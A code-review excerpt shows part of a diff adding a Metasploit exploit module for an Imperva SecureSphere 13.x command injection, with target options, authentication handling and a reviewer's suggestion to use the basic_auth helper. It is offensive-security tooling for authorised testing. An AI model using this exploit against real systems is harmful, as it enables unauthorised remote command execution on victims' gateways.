modules/exploits/linux/http/imperva_securesphere_exec.rb

```diff
@@ -0,0 +1,129 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::CmdStager
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name'           => 'Imperva SecureSphere PWS Command Injection',
+        'Description'    => %q(
+          This module exploits a command injection vulnerability in Imperva
+          SecureSphere 13.x. The vulnerability exists in the PWS service,
+          where Python CGIs didn't properly sanitize user supplied command
+          parameters and directly passes them to corresponding CLI utility,
+          leading to command injection. Agent registration credential is
+          required to exploit SecureSphere in gateway mode.
+
+          This module was successfully tested on Imperva SecureSphere 13.0/13.1/
+          13.2 in pre-ftl mode and unsealed gateway mode.
+        ),
+        'License'        => MSF_LICENSE,
+        'Author'         =>
+          [
+            'rsp3ar <lukunming<at>gmail.com>' # Discovery/Metasploit Module
+          ],
+        'References'     =>
+          [
+            [ 'EDB', '45542' ]
+          ],
+        'DisclosureDate'  => "Oct 8 2018",
+        'Platform'        => 'linux',
+        'Arch'            => [ARCH_X86, ARCH_X64],
+        'CmdStagerFlavor' => %w{ echo printf wget },
+        'Targets'         =>
+          [
+            ['Imperva SecureSphere 13.0/13.1/13.2', {}]
+          ],
+        'DefaultTarget'   => 0))
+
+    register_options(
+      [
+        OptPort.new('RPORT', [true, 'The target port', 443]),
+        OptBool.new('SSL', [false, 'Use SSL', true]),
+        OptString.new('USER', [false, 'Agent registration username', 'imperva']),
+        OptString.new('PASS', [false, 'Agent registration password', '']),
+        OptString.new('TARGETURI', [false, 'The URI path to impcli', '/pws/impcli']),
+        OptInt.new('TIMEOUT', [false, 'HTTP connection timeout', 3])
+      ])
+  end
+
+  def send_request(data)
+    req_params = {
+      'method'      => 'POST',
+      'uri'         => normalize_uri(target_uri.path),
+      'data'        => data.to_json
+    }
+
+    unless datastore['USER'].to_s.empty? or datastore['PASS'].to_s.empty?
+      unless defined? @cookie
+        res = send_request_cgi({
+          'method'      => 'GET',
+          'uri'         => normalize_uri('/')
+        })
+        @cookie = res.get_cookies
+      end
+
+      req_params['cookie'] = @cookie
+      req_params['headers'] = {
+        'Authorization' => 'Basic ' + Rex::Text.encode_base64(datastore['USER'] + ':' + datastore['PASS'])
```

Comment:
You should be able to use the `basic_auth` method from the `HttpClient` mixin here.

```suggestion
        'Authorization' => basic_auth(datastore['USER'], datastore['PASS'])
```